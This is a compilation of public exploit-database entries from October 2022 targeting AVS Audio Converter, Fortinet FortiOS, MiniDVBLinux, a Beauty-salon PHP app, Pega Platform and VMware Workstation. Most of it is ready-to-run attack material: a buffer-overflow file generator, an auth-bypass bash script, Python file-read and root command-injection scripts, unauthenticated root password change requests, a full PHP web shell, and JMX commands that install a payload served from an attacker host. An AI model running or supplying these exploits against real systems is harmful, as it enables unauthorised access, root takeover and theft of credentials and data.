PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 661 Connection: close Content-Type: application/json {"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"} ----------------------------------------------------------------------------------------------------------------------- See link: /files\/Messages\/7.php ----------------------------------------------------------------------------------------------------------------------- Req: ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/files/Messages/7.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,*/* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 11:28:16 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89945 [...] <title>PHP 7.4.30 - phpinfo()</title> [...] <h1 class="p">PHP Version 7.4.30</h1> </td></tr> </table> <table> <tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr> <tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr> <tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 [...]

# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH) # Discovered by: Yehia Elghaly - Mrvar0x # Discovered Date: 2022-10-16 # Tested Version: 10.3.1.633 # Tested on OS: Windows 7 Professional x86 #pop+ret Address=005154E6 #Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe) # The only module that has SafeSEH disabled. # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | # 0x00400000 | 0x01003000 | False | False | False | False | False | #Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes. #Buffer = '\x41'* 260 #nSEH = '\x42'*4 #SEH = '\x43'*4 #ESI = 'D*44' # ESI Overwrite #buffer = "A"*260 + [nSEH] + [SEH] + "D"*44 #buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44 # Rexploit: # Generate the 'evil.txt' payload using python 2.7.x on Linux. # Open the file 'evil.txt' Copy. # Paste at'Output Folder and click 'Browse'. #!/usr/bin/python -w filename="evil.txt" buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()

# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit # Exploit Author: LiquidWorm Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application is vulnerable to unauthenticated configuration download when direct object reference is made to the backup function using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. ==================================================================== /var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh: ------------------------------------------------------------ 01: <? 02: if [ "$GET_action" = "getconfig" ]; then 03: . /etc/rc.config 04: header "Content-Type: application/x-compressed-tar" 05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz" 06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null 07: cat /tmp/backup_config_$$.tgz 08: rm -rf /tmp/backup_config* 09: exit 10: fi 11: ?> 12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div> ==================================================================== Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5713 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php 24.09.2022 -- > curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz > mkdir configdir > tar -xvzf config.tgz -C .\configdir > cd configdir && cd etc > type passwd root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh daemon:!:1:1::/: ftp:!:40:2:FTP account:/:/bin/sh user:!:500:500::/home/user:/bin/sh nobody:!:65534:65534::/tmp: _rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin >

# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager) # Date: 13/10/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.fortinet.com/ # Version: #FortiOS from 7.2.0 to 7.2.1 #FortiOS from 7.0.0 to 7.0.6 #FortiProxy 7.2.0 #FortiProxy from 7.0.0 to 7.0.6 #FortiSwitchManager 7.2.0 #FortiSwitchManager 7.0.0 # Tested on: Kali Linux # CVE : CVE-2022-40684 # https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass # Usage: ./poc.sh <ip> <port> # Example: ./poc.sh 10.10.10.120 8443 #!/bin/bash red="\e[0;31m\033[1m" blue="\e[0;34m\033[1m" yellow="\e[0;33m\033[1m" end="\033[0m\e[0m" target=$1 port=$2 vuln () { echo -e "${yellow}[+] Dumping System Information: ${end}" timeout 10 curl -s -k -X $'GET' \ -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out if [ "$?" == "0" ];then grep "results" ./$target.out >/dev/null if [ "$?" == "0" ];then echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}" else rm -f ./$target.out echo -e "${red}Not Vulnerable ${end}" fi else echo -e "${red}Not Vulnerable ${end}" rm -f ./$target.out fi } vuln

# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows the usage of the SVDRP protocol/commands to be sent by a remote attacker to manipulate and/or control remotely the TV. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5714 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php 24.09.2022 -- Send a message to the TV screen: curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU! 220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8 250 Message queued 221 mld closing connection For more commands: - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands

# Exploit Title: MiniDVBLinux 5.4 - Change Root Password # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Change Root Password PoC Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows a remote attacker to change the root password of the system without authentication (disabled by default) and verification of previously assigned credential. Command execution also possible using several POST parameters. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5715 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php 24.09.2022 -- Default root password: mld500 Change system password: ----------------------- POST /?site=setup&section=System HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 778 Content-Type: application/x-www-form-urlencoded Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba Host: ip:8008 Origin: http://ip:8008 Referer: http://ip:8008/?site=setup&section=System Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 sec-gpc: 1 APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+ Pretty post data: APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: r00t BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Kumanovo KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: SYSTEM_PASSWORD Eenable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 WEBIF_PASSWORD_CHECK: 1 action: save params: changed: WEBIF_PASSWORD_CHECK Disable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: WEBIF_PASSWORD_CHECK

# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application suffers from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). -------------------------------------------------------------------- /var/www/tpl/tv_action.sh: -------------------------- 01: #!/bin/sh 02: 03: header 04: 05: quality=60 06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")" 07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null -------------------------------------------------------------------- Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5716 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php 24.09.2022 -- 1. Generate screengrab: - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 250 Grabbed image /tmp/tv.jpg 60 221 mld closing connection 2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg 3. Or use a browser: - http://ip:8008/home?site=remotecontrol

# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Arbitrary File Read Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The distribution suffers from an arbitrary file disclosure # vulnerability. Using the 'file' GET parameter attackers can disclose # arbitrary files on the affected device and disclose sensitive and system # information. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5719 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT if len(sys.argv) < 3: print('MiniDVBLinux 5.4 File Disclosure PoC') print('Usage: ./mldhd_fd.py [url] [file]') sys.exit(17) else: url = sys.argv[1] fil = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file='+fil) outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>',''))

# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The application suffers from an OS command injection vulnerability. # This can be exploited to execute arbitrary commands with root privileges. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5717 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT #test case 004 #http://ip:8008/?site=about&name=blind&file=$(id) #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory #test case 005 #http://ip:8008/?site=about&name=blind&file=`id` #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory if len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Injection PoC') print('Usage: ./mldhd_root2.py [url] [cmd]') sys.exit(17) else: url = sys.argv[1] cmd = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>',''))

## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 10.12.2022 ## Vendor: https://code4berry.com/projects/beautysalon.php ## Software: https://code4berry.com/project%20downloads/beautysalon_download.php ## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt ## Description: The parameter `userimage` from Beauty-salon-2022 suffers from Web Shell-File Upload - RCE. NOTE: The user permissions of this system are not working correctly, and the function is not sanitizing well. The attacker can use an already created account from someone who controls this system and he can upload a very malicious file by using this vulnerability, or more precisely (no sanitizing of function for edit image), for whatever account, then he can execute it from anywhere on the external network. Status: HIGH Vulnerability [+] Exploit: ```php <!-- Project Name : PHP Web Shell --> <!-- Version : 4.0 nu11secur1ty --> <!-- First development date : 2022/10/05 --> <!-- This Version development date : 2022/10/05 --> <!-- Moded and working with PHP 8 : 2022/10/05 --> <!-- language : html, css, javascript, php --> <!-- Developer : nu11secur1ty --> <!-- Web site : https://www.nu11secur1ty.com/ --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" " http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html" charset="euc-kr"> <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title> <script type="text/javascript"> function FocusIn(obj) { if(obj.value == obj.defaultValue) obj.value = ''; } function FocusOut(obj) { if(obj.value == '') obj.value = obj.defaultValue; } </script> </head> <body> <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?></b><br><br> HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br> REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br> <br> <form name="cmd_exec" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> <input type="text" name="cmd" size="70" maxlength="500" value="Input command to execute" onfocus="FocusIn(document.cmd_exec.cmd)" onblur="FocusOut(document.cmd_exec.cmd)"> <input type="submit" name="exec" value="exec"> </form> <?php if(isset($_POST['exec'])) { exec($_POST['cmd'],$result); echo '----------------- < OutPut > -----------------'; echo '<pre>'; foreach($result as $print) { $print = str_replace('<','<',$print); echo $print . '<br>'; } echo '</pre>'; } else echo '<br>'; ?> <form enctype="multipart/form-data" name="file_upload" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> <input type="file" name="file"> <input type="submit" name="upload" value="upload"><br> <input type="text" name="target" size="100" value="Location where file will be uploaded (include file name!)" onfocus="FocusIn(document.file_upload.target)" onblur="FocusOut(document.file_upload.target)"> </form> <?php if(isset($_POST['upload'])) { $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']); if($check == TRUE) echo '<pre>The file was uploaded successfully!!</pre>'; else echo '<pre>File Upload was failed...</pre>'; } ?> </body> </html> ``` # Proof and Exploit: [href](https://streamable.com/ewdmoh) # m0e3: [href]( https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html ) System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 20 Oct 2022 # Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit) # Vendor Homepage: www.pega.com # Software Link: Not Available # Version: 8.1.0 on-premise and higher, up to 8.3.7 # Tested on: Red Hat Enterprise 7 # CVE : CVE-2022-24082 ;Dumping RMI registry: nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address> ;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1 :<PORT>) ;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well): nmap -sT -sV -p <PORT> <IP Address> ;Exploitation requires: ;- JVM ;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet) ;- jython ;Installing mbean for remote code execution java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666 ;Execution of commands id & ifconfig java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig" ;More details: https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316 Kind Regards, Marcin Wolak

#Title: VMware Workstation 15 Pro - Denial of Service #Author: Milad Karimi #Date: 2022-10-17 #Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506) #Affected: VMware Workstation Pro/Player 15.x config.version = "8" virtualHW.version = "4" displayName = "credit's to Ex3ptionaL for find this vouln" annotation = "Live CD ISO http://www.irongeek.com" guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln" guestinfo.vmware.product.url = "http://www.millw0rm.com" guestinfo.vmware.product.short = "LCDI" guestinfo.vmware.product.version.major = "1" guestinfo.vmware.product.version.minor = "0" guestinfo.vmware.product.version.revision = "0" guestinfo.vmware.product.version.type = "release" guestinfo.vmware.product.class = "virtual machine" guestinfo.vmware.product.build = "1.0.0rc8-20051212" uuid.action = "create" guestOS = "winxppro" ##### # Memory ##### memsize = "20000000000000" # memsize = "300000000000000000000000000000" # memsize = "400000000000000000000" # memsize = "700000000000000000000000000000000000" # # Alternative larger memory allocations ##### # USB ##### usb.present = "TRUE" ##### # Floppy ##### floppy0.present = "FALSE" ##### # IDE Storage ##### ide1:0.present = "TRUE" #Edit line below to change ISO to boot from ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso" ide1:0.deviceType = "cdrom-image" ide1:0.startConnected = "TRUE" ide1:0.autodetect = "TRUE" ##### # Network ##### ethernet0.present = "TRUE" ethernet0.connectionType = "nat" # ethernet0.connectionType = "bridged" # # Switch these two to enable "Bridged" vs. "NAT" ##### # Sound ##### sound.present = "TRUE" sound.virtualDev = "es1371" sound.autoDetect = "TRUE" sound.fileName = "-1" ##### # Misc. # # (normal) high priority.grabbed = "high" tools.syncTime = "TRUE" workingDir = "." # # (16) 32 64 sched.mem.pShare.checkRate = "32" # # (32) 64 128 sched.mem.pshare.scanRate = "64" # # Higher resolution lockout, adjust values to exceed 800x600 svga.maxWidth = "8000000000000000000" svga.maxHeight = "6000000000000000000" # # (F) T isolation.tools.dnd.disable = "FALSE" # # (F) T isolation.tools.hgfs.disable = "FALSE" # # (F) T isolation.tools.copy.disable = "FALSE" # # (F) T isolation.tools.paste.disable = "FALSE" # # (T) F logging = "TRUE" # # # (F) T log.append = "FALSE" # # (3) number of older files kept log.keepOld = "1" # # (0) microseconds keyboard.typematicMinDelay = 100000000000000000 uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" ethernet0.addressType = "generated" ethernet0.generatedAddress = "00:0c:29:3c:d4:4a" ethernet0.generatedAddressOffset = "0" checkpoint.vmState = "live-cd-iso.vmss" tools.remindInstall = "TRUE" Exploit code() buffer = "A" * 118000000000000000 payload = buffer try: f=open("PoC.vmx","w") print "[+] Creating %s evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

